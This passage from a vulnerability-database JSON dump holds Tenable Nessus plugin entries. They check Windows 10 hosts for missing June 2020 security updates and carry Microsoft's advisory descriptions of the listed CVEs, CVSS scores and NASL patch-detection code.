(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. 
(CVE-2020-1244)\");\n # https://support.microsoft.com/en-us/help/4561608/windows-10-update-kb4561608\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cd5594\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561608.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561608'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561608])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:13", "description": "The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. 
An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. 
(CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. 
An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. 
The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. 
An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561621: Windows 10 Version 1803 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", 
"cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561621.NASL", "href": "https://www.tenable.com/plugins/nessus/137259", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137259);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n 
\"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561621\");\n script_xref(name:\"MSFT\", value:\"MS20-4561621\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561621: Windows 10 Version 1803 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. 
The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. 
(CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege 